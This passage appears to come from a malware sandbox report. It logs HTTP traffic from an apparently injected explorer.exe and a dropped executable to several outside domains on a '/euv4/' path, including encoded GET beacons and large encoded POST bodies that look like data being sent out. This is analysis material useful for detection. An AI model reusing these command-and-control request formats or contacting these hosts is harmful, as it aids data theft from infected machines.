                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:05:33.964865923 CET12068INHTTP/1.1 404 Not Found
                                                                                              Date: Fri, 28 Jan 2022 18:05:33 GMT
                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                              Content-Length: 278
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 62 75 33 63 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bubu3cin.com Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              15192.168.2.34982434.90.73.14580C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:05:44.340848923 CET12069OUTGET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY HTTP/1.1
                                                                                              Host: www.bestpleasure4u.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:05:44.367376089 CET12069INHTTP/1.1 301 Moved Permanently
                                                                                              Server: nginx
                                                                                              Date: Fri, 28 Jan 2022 18:05:44 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 178
                                                                                              Connection: close
                                                                                              Location: https://bestpleasure4u.com//euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              16192.168.2.349825198.54.117.21780C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:05:49.572633028 CET12070OUTGET /euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1
                                                                                              Host: www.cielotherepy.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              17192.168.2.34982652.89.53.12280C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:05:55.428939104 CET12071OUTGET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp HTTP/1.1
                                                                                              Host: www.pkem.top
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:05:55.618196964 CET12071INHTTP/1.1 404
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Fri, 28 Jan 2022 18:05:55 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              Vary: Access-Control-Request-Method
                                                                                              Vary: Access-Control-Request-Headers
                                                                                              Data Raw: 35 39 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 36 34 33 33 39 33 31 35 35 36 38 35 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 70 61 74 68 22 3a 22 2f 65 75 76 34 2f 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 59{"timestamp":1643393155685,"status":404,"error":"Not Found","message":"","path":"/euv4/"}0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              18192.168.2.349827162.0.214.18980C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:06:00.877372026 CET12072OUTGET /euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9 HTTP/1.1
                                                                                              Host: www.bubu3cin.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:06:01.114487886 CET12073INHTTP/1.1 404 Not Found
                                                                                              Date: Fri, 28 Jan 2022 18:06:00 GMT
                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                              Content-Length: 278
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 62 75 33 63 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bubu3cin.com Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              19192.168.2.34983134.102.136.18080C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:06:17.744446039 CET12116OUTPOST /euv4/ HTTP/1.1
                                                                                              Host: www.mehfeels.com
                                                                                              Connection: close
                                                                                              Content-Length: 411
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.mehfeels.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.mehfeels.com/euv4/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 79 42 43 5a 54 41 62 35 72 56 62 62 76 4c 37 56 35 56 52 4f 67 64 45 42 64 35 49 70 42 7a 71 71 34 52 6d 50 50 5a 4e 39 46 4d 4b 53 41 34 42 4d 59 54 75 52 79 42 37 61 46 74 76 6d 73 43 62 45 53 77 76 57 75 57 54 6a 72 64 4e 73 32 38 53 7a 76 50 56 34 71 6b 35 77 75 76 6e 51 74 73 53 48 38 6f 6c 79 4e 6e 2d 48 45 34 44 51 4e 58 67 39 5f 32 38 50 76 7a 77 50 66 65 44 57 36 36 32 7a 62 63 6c 59 49 4c 34 53 42 57 73 69 48 4d 69 28 4f 6e 6f 4d 64 61 56 78 66 32 47 6e 75 70 31 6a 6c 51 4f 6b 65 61 52 6b 6c 69 49 44 33 56 78 6b 61 71 78 76 6a 41 74 4f 34 6b 77 4d 39 39 6d 44 2d 62 4a 6d 4b 43 6f 37 30 43 39 76 4b 78 39 69 63 4e 65 56 77 32 4e 73 67 78 50 41 4d 73 72 59 56 36 63 7a 48 73 6b 56 4e 49 77 47 62 6d 4f 6c 4c 70 64 4e 41 71 39 34 4f 36 57 4e 63 39 56 4b 53 61 4f 48 57 54 57 38 4b 6d 31 39 6c 6d 78 69 44 58 4e 56 4a 64 52 56 73 39 68 53 74 48 76 43 66 67 76 6f 44 50 55 79 61 59 53 6b 37 72 30 28 35 42 39 70 2d 7e 6a 56 77 65 46 55 77 78 54 75 4a 4d 2d 48 38 68 52 49 35 76 6f 47 43 57 56 34 5a 49 70 73 50 4f 36 39 34 6b 52 34 38 62 53 58 43 48 34 4b 72 4a 4c 31 39 4b 4f 54 5f 78 59 56 4f 39 6d 39 6d 39 70 30 66 7a 5a 65 2d 52 6f 64 53 45 59 49 74 39 4c 6e 66 74 49 54 67 29 2e 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: BXxXk=fDzhVyBCZTAb5rVbbvL7V5VROgdEBd5IpBzqq4RmPPZN9FMKSA4BMYTuRyB7aFtvmsCbESwvWuWTjrdNs28SzvPV4qk5wuvnQtsSH8olyNn-HE4DQNXg9_28PvzwPfeDW662zbclYIL4SBWsiHMi(OnoMdaVxf2Gnup1jlQOkeaRkliID3VxkaqxvjAtO4kwM99mD-bJmKCo70C9vKx9icNeVw2NsgxPAMsrYV6czHskVNIwGbmOlLpdNAq94O6WNc9VKSaOHWTW8Km19lmxiDXNVJdRVs9hStHvCfgvoDPUyaYSk7r0(5B9p-~jVweFUwxTuJM-H8hRI5voGCWV4ZIpsPO694kR48bSXCH4KrJL19KOT_xYVO9m9m9p0fzZe-RodSEYIt9LnftITg).
                                                                                              Jan 28, 2022 19:06:17.859910011 CET12155INHTTP/1.1 405 Not Allowed
                                                                                              Server: openresty
                                                                                              Date: Fri, 28 Jan 2022 18:06:17 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 154
                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_NvOtOM7a6Ifuy7RNwlyDWipJUS9NcK2BPDj5u6z3Uzh/g3H8VkvHesYwkvzTfsVz8XG/p2BGbOi95GsGAmHHUA
                                                                                              Via: 1.1 google
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.349747162.159.130.233443C:\Users\user\Contacts\Tdfgwnfyyv.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              20192.168.2.34983234.102.136.18080C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:06:17.763077974 CET12130OUTPOST /euv4/ HTTP/1.1
                                                                                              Host: www.mehfeels.com
                                                                                              Connection: close
                                                                                              Content-Length: 36479
                                                                                              Cache-Control: no-cache
                                                                                              Origin: http://www.mehfeels.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://www.mehfeels.com/euv4/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Data Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 7a 39 51 48 77 45 34 33 62 4a 52 66 64 37 76 62 6f 6c 58 4d 77 5a 78 46 73 46 54 74 7a 62 41 75 35 68 66 4f 4e 4a 58 77 56 34 72 57 44 49 4a 4d 59 69 34 64 68 31 5f 51 46 68 6f 6d 73 71 6c 45 53 6b 76 58 75 75 44 36 4e 41 69 72 55 55 54 79 50 50 70 37 71 6c 76 30 73 61 46 51 74 6f 38 48 38 68 67 78 2d 7a 2d 49 42 6b 44 45 2d 50 72 7a 5f 32 36 41 5f 43 68 4c 65 6a 76 57 36 69 51 7a 61 67 6c 5a 34 50 34 55 68 6d 72 31 51 68 30 32 2d 6e 68 65 4e 61 4d 71 76 71 53 6e 74 46 4c 6a 6b 73 4f 6b 73 4f 52 6c 30 43 49 46 47 56 75 76 4b 71 4f 35 54 41 38 66 6f 6f 62 4d 39 67 30 44 36 6a 33 6d 59 65 6f 37 45 43 2d 72 64 46 66 6d 50 56 77 59 52 53 36 73 67 4d 45 41 5a 4d 6a 59 51 7a 6f 6c 6c 31 61 4a 5f 68 6c 47 5a 4b 6f 69 62 70 6e 66 67 72 35 34 4f 37 6e 4e 63 39 72 4b 53 71 4f 48 52 50 57 38 76 71 31 71 33 4f 32 74 44 58 4d 4d 5a 63 4d 66 4d 68 4e 53 74 4f 30 43 65 4a 4b 6f 30 33 55 6a 4c 6f 53 73 6f 7a 7a 6e 4a 42 5f 6b 65 7e 32 66 51 65 30 55 77 78 6c 75 49 4d 58 48 4b 35 52 4f 6f 76 6f 47 67 4f 56 36 70 49 70 78 5f 4f 43 7a 59 34 6e 34 38 44 57 58 44 57 50 4b 59 46 4c 79 73 71 4f 54 65 78 59 53 2d 39 6d 78 47 38 56 30 4b 62 54 58 75 39 64 4f 42 34 78 42 71 63 2d 79 66 34 52 44 33 45 35 7e 34 52 77 6c 71 63 53 66 73 4b 68 79 79 58 56 74 6c 6d 39 48 59 34 64 67 4b 7e 42 65 35 54 68 69 4b 30 33 79 76 49 75 31 32 4d 4b 4e 53 4f 78 42 4b 66 46 66 4b 67 5f 73 44 74 35 6a 45 4d 58 4e 6a 44 42 31 55 59 6a 58 77 51 37 46 6c 65 47 42 6d 58 53 53 76 45 46 79 50 57 7a 45 49 4c 45 4a 37 55 45 41 63 53 71 77 36 58 48 36 76 65 4a 34 6d 34 42 42 34 73 48 69 61 31 63 4a 54 4c 6f 79 34 5a 6f 7a 35 38 47 47 51 79 62 54 65 6c 61 54 53 49 50 54 46 68 69 7a 4e 50 5f 6e 71 45 74 55 71 39 66 43 64 76 4c 35 47 6b 59 66 6f 75 2d 56 36 38 6d 39 75 77 31 62 71 33 72 38 70 57 54 67 45 4c 62 49 5f 38 49 54 71 77 6e 74 4a 58 5f 6d 6c 6a 4f 76 51 77 41 48 33 7a 5a 49 49 52 31 62 39 50 48 57 42 52 39 6f 41 65 61 61 44 41 41 43 6c 32 66 74 36 44 6a 41 65 69 54 57 73 64 41 4b 7a 33 43 7a 6d 5a 4e 6c 34 63 78 62 65 4e 51 6e 42 56 34 79 5f 4f 48 59 45 65 5a 36 5f 6e 46 62 4d 6c 6b 35 59 39 54 57 48 74 34 51 4a 57 47 4c 67 71 56 4d 32 77 51 31 68 63 71 78 37 6c 31 61 72 64 4e 39 30 67 63 43 70 30 57 72 48 53 4f 4b 39 28 6e 28 37 37 41 75 76 4f 4f 6b 78 4c 5a 5a 58 7e 46 34 4c 6f 51 46 37 73 64 62 57 4f 73 66 65 4b 74 51 31 28 72 5a 65 7e 42 32 66 39 49 47 48 76 4d 4e 36 54 51 43 54 61 45 30 6a 34 72 6d 5a 49 6b 73 42 65 4c 72 31 58 31 46 48 6c 42 33 33 75 6f 30 47 4c 70 7a 64 6d 58 4b 57 79 74 65 4d 5a 34 53 76 63 53 31 46 58 46 70 6f 38 49 36 73 47 71 79 6c 56 52 4e 4b 4b 44 6c 54 41 38 57 63 76 65 57 52 6b 48 41 77 59 76 72 46 76 71 45 39 48 68 65 73 39 55 6d 42 42 56 77 30 34 61 31 58 4e 36 75 74 36 5f 7a 79 43 61 57 6b 76 5f 7e 6c 42 67 67 31 43 2d 47 78 57 77 65 4d 79 2d 59 71 7a 4f 67 51 64 73 54 30 4e 48 32 53 66 68 53 6f 4d 49 75 63 4c 53 7a 56 66 6f 70 54 6c 64 44 6c 28 43 78 6f 48 32 63 78 73 72 72 76 6b 72 67 5a 36 37 63 57 70 48 71 56 39 6d 53 66 4a 61 79 51 43 53 7e 4e 76 2d 72 65 77 41 4a 30 6a 50 52 77 5a 44 30 30 69 43 7a 6c 49 6c 74 68 4e 39 62 69 28 52 7e 66 61 63 38 59 37 39 44 4f 61 32 59 7a 38 63 66 58 78 76 64 73 51 32 53 71 36 36 31 37 68 48 39 53 74 42 51 56 61 35 65 4a 55 63 41 5f 50 4d 69 4c 47 31 4f 55 58 5a 68 65 6b 49 61 74 6a 5f 78 55 58 59 64 50 48 32 59 50 30 66 49 45 44 41 5a 47 30 61 54 77 62 41 78 64 48 39 70 51 72 74 75 78 74 57 68 4c 7e 32 38 6a 62 5a 34 65 36 5f 73 36 4e 4d 48 67 39 35 61 6a 4c 6f 28 33 7e 7a 71 30 71 68 4e 72 44 67 51 75 4f 74 37 37 30 41 6f 50 6e 6a 75 45 75 58 7e 79 6b 32 4d 4b 5a 45 6f 42 71 57 33 63 4e 69 44 39 34 41 54 6c 4e 2d 79 51 4b 69 7e 66 43 77 55 6a 38 6c 30 2d 5a 71 54 45 6e 30 4d 6a 4e 7a 4c 6e 63 59 7a 33 53 52 64 5a 64 61 30 6d 67 61 4e 51 6e 50 70 57 4f 69 54 55 43 61 65 6e 6d 69 6e 41 52 32 69 5f 5a 62 6e 44 6e 43 77 41 7e 46 78 4b 78 65 45 42 4e 39 42 53 4f 54 56 34 61 6c 43 70 63 42 62 5a 6b 65 62 35 48 64 28 76 50 45 49 53 41 38 53 47 47 5f 69 43 6e 73 65 73 64 66 51 53 76 4e 65 70 54 77 68 56 51 30 47 43 33 4e 69 71 46 6e 4b 30 5a 45 74 35 41 4a 59
                                                                                              Data Ascii: BXxXk=fDzhVz9QHwE43bJRfd7vbolXMwZxFsFTtzbAu5hfONJXwV4rWDIJMYi4dh1_QFhomsqlESkvXuuD6NAirUUTyPPp7qlv0saFQto8H8hgx-z-IBkDE-Prz_26A_ChLejvW6iQzaglZ4P4Uhmr1Qh02-nheNaMqvqSntFLjksOksORl0CIFGVuvKqO5TA8foobM9g0D6j3mYeo7EC-rdFfmPVwYRS6sgMEAZMjYQzoll1aJ_hlGZKoibpnfgr54O7nNc9rKSqOHRPW8vq1q3O2tDXMMZcMfMhNStO0CeJKo03UjLoSsozznJB_ke~2fQe0UwxluIMXHK5ROovoGgOV6pIpx_OCzY4n48DWXDWPKYFLysqOTexYS-9mxG8V0KbTXu9dOB4xBqc-yf4RD3E5~4RwlqcSfsKhyyXVtlm9HY4dgK~Be5ThiK03yvIu12MKNSOxBKfFfKg_sDt5jEMXNjDB1UYjXwQ7FleGBmXSSvEFyPWzEILEJ7UEAcSqw6XH6veJ4m4BB4sHia1cJTLoy4Zoz58GGQybTelaTSIPTFhizNP_nqEtUq9fCdvL5GkYfou-V68m9uw1bq3r8pWTgELbI_8ITqwntJX_mljOvQwAH3zZIIR1b9PHWBR9oAeaaDAACl2ft6DjAeiTWsdAKz3CzmZNl4cxbeNQnBV4y_OHYEeZ6_nFbMlk5Y9TWHt4QJWGLgqVM2wQ1hcqx7l1ardN90gcCp0WrHSOK9(n(77AuvOOkxLZZX~F4LoQF7sdbWOsfeKtQ1(rZe~B2f9IGHvMN6TQCTaE0j4rmZIksBeLr1X1FHlB33uo0GLpzdmXKWyteMZ4SvcS1FXFpo8I6sGqylVRNKKDlTA8WcveWRkHAwYvrFvqE9Hhes9UmBBVw04a1XN6ut6_zyCaWkv_~lBgg1C-GxWweMy-YqzOgQdsT0NH2SfhSoMIucLSzVfopTldDl(CxoH2cxsrrvkrgZ67cWpHqV9mSfJayQCS~Nv-rewAJ0jPRwZD00iCzlIlthN9bi(R~fac8Y79DOa2Yz8cfXxvdsQ2Sq6617hH9StBQVa5eJUcA_PMiLG1OUXZhekIatj_xUXYdPH2YP0fIEDAZG0aTwbAxdH9pQrtuxtWhL~28jbZ4e6_s6NMHg95ajLo(3~zq0qhNrDgQuOt770AoPnjuEuX~yk2MKZEoBqW3cNiD94ATlN-yQKi~fCwUj8l0-ZqTEn0MjNzLncYz3SRdZda0mgaNQnPpWOiTUCaenminAR2i_ZbnDnCwA~FxKxeEBN9BSOTV4alCpcBbZkeb5Hd(vPEISA8SGG_iCnsesdfQSvNepTwhVQ0GC3NiqFnK0ZEt5AJYmsznv2O7P16TKhuoN8tKvpT7w4uspsMVlxXVDxN2D0KNQgIo-ZfBXUzBn7TfqOizhZzmGfbLq5ZQTW3Loe5xmnW~yPG1DwON2x2qrqI2sRqD5fojJmUz1lK03GuJsmroOKDyZUM~Tm_NNa4eEMUTZdMlSqcZDW6F8Fs0kdTg1qyOCUCeAw9H49yDSk93E5rEQSrimM8ztc9PAuH4he2aHz5XOD2DIfqckQy6Z~PFJgBsXA0UP8pKpAFjoEMfu~3Tumhk8kSUFiYlBMtNQuLTfLShSH8sup0k04o~j(QNNeTe2NtQErVfigyVvcnnD16mjfLZuHz7H6jXMRn7SuAA5lSL-NHeASbVcRbJVsh6n84RJtfbja1cmeX5cdILYmkDXdJ6UzGW0Ig5gh7sheOmII35Sv-DltdAu2glIpefO1phm5qIcTqsMaNzNI4iLbNsQcfUYKtaEi6qUNs9CJoxRik(frSHSoH9AiFNVOzCDXsgShRayCA2Lbz01dpejjXmA~iQ-hGUjNUNwPevwZLtCgQRC2O9z~O4qqgp0pJKp4OqzxiYMw9T9vwOnuMDowLBhGKMkYCIA8DLQK7udoezN4zGTj7Vo~P(aLRZS7mRV~74Gp4yoNriOxo4kLrWNHmLHw3TYC3ySpVJD(zwsut1kqYgAxorpLoSUdoKiKZxq1S~SZTELlG0IKZB0ugCajxRoTnRLQSOKFzscrmak8XzB4sF5CllTMS22ii8l9TU3hfoYHwu_QibPcYNPQxpzltRcDjQJ9tKFmvs1IqiayyO8zcmAN5wJwJDdiQ52TINAA1ex2PfBH_7bqISfbpjc8oxvtbeJvhP3~d7J6-sLzLnvJ-IdXiTl6J7iJWRkR-Jfk1fRmDRt(elWorQXEoVYJfGvt3dLBaDdfWQW~BKFKi7_SetWVNFX8MjBfaKqLZnvgi4-QcaE2CmGfbPowtaJS-TcHnOGXVfWjr8QntM6o4KYOT54ylJN7DxQvda3ofe12RbByLLDwIhB8YTh(iIxw33gAo7yRb88WUH1(l~r02aI7s6H0-t-4lIyUlVilo3G9LdXS2Bn5nYC8_2bWzCwgbGpqUoAhE8QoyYILO5vqSlFMrzlqE8Z~_Pvz-CWCnW6XJurcn5mGsltTNbUYW~gXncxR1zBiY8xTD5yztOOZxIoRCY7UqjdHhshMvj4LdfbWLpRDH3Qpo0IOv(lS75J2XeA7KrCo713nvkRTmR_34MSUr7HyBe9sRBa6mZHKeEs~NQGYc6juhgt(qeXSvPRgHhWb5tKsNP6eHgUfzm3Kf6lZLgkPm7kaQmAGnEgL0Twu4sdsMdsvWjKcoOa3o5ndUrDuFQgTk84laFO81EdD4OMNP6nRpI54GNx1NZuQmrWOHAo8y8ltHmDJQwMatzdvMUSmwMhiKiW9gbuR-7vDU5PllAKxZx0Q17_mUitjzXbgs0pWGpPkXKDG0lLk7S09jor8OMx9EIrGTC7ogGIOZLaS3OZMQfFv_YgLGpjNeJLB_Pi7rRA4AKX(Qk7~kgJLV5NzmIYULBcobQYoidRF-GXuzN7r6WPt_yyJj1h~wrON-TGjBPd5UPVhSRwRXx560orSbO7pR2AyFQzoFKagHCI7ZRr6NpraBiIHLi0DtowpnCAw8ZZvwRqbFx0BsoO4kdJxc6cGG~ze8FHDLte37YDL3~KGBDf(Lx6zmuKC5QGOCAJbpWfhFTlsihuGltQWKeQ~scqryZcbyXsw-5oKR3bNBNPRDlVQzyWW4xrMdo1W6rA4pqpoSTWzhlmq9hxbxzW0zMUj1SvDJ~5yJmOYxHLPgoy(srB~Rbcalxjvq5vkzhmOwzabbCWpTAguAcCNOXOa32wtbPxbLIWGC39H9X5XV4qUG9Rerp4I9Do9i7ajD~MBuRUnUGYkeQvfnG3gQk0MQJDtaEb3bK-gL6ecNR11NGtkux-sfuLLinFBTQJxW(fF6gdqiXb2MKWVk1yd9UgNTRytDm-SzkrbRkSy0IyMHEwPZyKWmJ-4XEdC0CqzR8Tch2aCeNEMSqqHGI1orzxFTo3Bemgiqx4YRCapO(yKkUU4MEfRR6hL6VbANvkhrx3KaRq7fckg6UJ42ilGLX82ED6I6(PVL9jd_232NtfLTwCgMke8vCYuyUSkbT5dsTsg4OkwZ~GAXH6qMi_VflOLMcbgTUuLA0cGpiXeIHAnIESwF(PmVSUPZKG1xCCuF8bztUbhwyFZj61LZCFyThOKwJm3GiHcQGMCJ2GPcKD6zdVBv4eXgZjYXWi1MJpPBxGXTMXDb~8U10FXMXtxspoRYk73L(zbhvnda(cC2HMR_zra7IDQWIq5TEGvCLY1jr2~Erz2IA7CLBi7uZxtLCPIN9JY09hmozhfZMQ8w7Myn4oPjVMT_5sj_HyO3V3FVSyZj8UK0HOXfaDhsJktsNliM3O2IFzkkADehfFO_yS9mlb96KlcHIjwTm7jhY7dBaFWIsBf_NrYYSssM0BRqdzt3Ld(-B_hByosHUvGJ4Cpn4b2ul8smXqu-qB~5a3wgD6izYKUDE_lZqJi1vp(lw5~-zY2GecE44_LPTf7ojv2meAQxhvww(vexLUOEzJdFeCk3P_m63X(9(XrwzOQ_zeBL8VKlrT0vh8k9VSslqnRAMK4px4aQCLFpMLAwU2LRvYSLPYiJ6mQmIPGzTK6jLibnvBteM25vi7d-(YRRya0J~3SXZobuZEz2
                                                                                              Jan 28, 2022 19:06:18.157286882 CET12157INHTTP/1.1 405 Not Allowed
                                                                                              Server: openresty
                                                                                              Date: Fri, 28 Jan 2022 18:06:17 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 154
                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_NvOtOM7a6Ifuy7RNwlyDWipJUS9NcK2BPDj5u6z3Uzh/g3H8VkvHesYwkvzTfsVz8XG/p2BGbOi95GsGAmHHUA
                                                                                              Via: 1.1 google
                                                                                              Connection: close
